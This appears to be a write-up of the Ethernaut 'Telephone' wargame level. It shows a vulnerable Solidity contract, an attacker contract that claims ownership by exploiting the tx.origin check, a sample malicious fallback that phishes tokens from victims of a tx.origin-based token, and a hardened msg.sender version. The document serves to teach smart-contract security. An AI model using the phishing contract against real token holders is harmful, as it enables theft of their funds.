Problem
Claim ownership of the contract below to complete this level.
```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Telephone {
    address public owner;

    constructor() {
        owner = msg.sender;
    }

    function changeOwner(address _owner) public {
        if (tx.origin != msg.sender) {
            owner = _owner;
        }
    }
}
```
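Solution
```solidity
// Compile in the same file as Telephone (or import it) so the type resolves.
contract TelephoneSolv {
    address target; // address of the deployed Telephone instance

    constructor(address _target) {
        target = _target;
    }

    // Called from an EOA: inside Telephone, tx.origin is the EOA and
    // msg.sender is this contract, so the tx.origin != msg.sender check passes.
    function changeOwner(address _owner) public {
        Telephone(target).changeOwner(_owner);
    }
}
```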
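tx.origin: the EOA that originally sent the transaction
msg.sender: the EOA or CA (contract account) that sent the transaction last, i.e. the immediate caller
Confusing tx.origin with msg.sender can lead to phishing-style attacks.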
An example of a possible attack is outlined below.
In this scenario, tx.origin will be the victim's address (while msg.sender will be the malicious contract's address), resulting in the funds being transferred from the victim to the attacker.
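```solidity
// Token contract: uses tx.origin to decide whose tokens to debit.
function transfer(address _to, uint _value){
    tokens[tx.origin] -= _value;
    tokens[_to] += _value;
}

// Malicious contract: fallback function (legacy pre-0.6 syntax) that runs
// when the victim sends funds to it and calls the token's transfer.
function () payable {
    token.transfer(attackerAddress, 10000);
}
```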
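The same token with the debit keyed on msg.sender instead of tx.origin, as an added example that is not part of the original post or of Ethernaut. SafeToken, balances, allowance, approve and transferFrom are hypothetical names chosen for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example: hypothetical hardened counterpart of the token above.
contract SafeToken {
    mapping(address => uint256) public balances;
    mapping(address => mapping(address => uint256)) public allowance;

    constructor(uint256 supply) {
        balances[msg.sender] = supply;
    }

    // Debits the immediate caller. If a holder is lured into calling an
    // intermediary contract, msg.sender here is that contract, so only the
    // contract's own balance can move, never the holder's.
    function transfer(address to, uint256 value) external {
        require(balances[msg.sender] >= value, "insufficient balance");
        balances[msg.sender] -= value;
        balances[to] += value;
    }

    // A contract may spend a holder's tokens only after the holder has
    // approved it in a separate call made by the holder.
    function approve(address spender, uint256 value) external {
        allowance[msg.sender][spender] = value;
    }

    // Spending on someone's behalf is checked against the allowance granted
    // to the immediate caller, not against whoever started the transaction.
    function transferFrom(address from, address to, uint256 value) external {
        require(allowance[from][msg.sender] >= value, "not approved");
        require(balances[from] >= value, "insufficient balance");
        allowance[from][msg.sender] -= value;
        balances[from] -= value;
        balances[to] += value;
    }
}
```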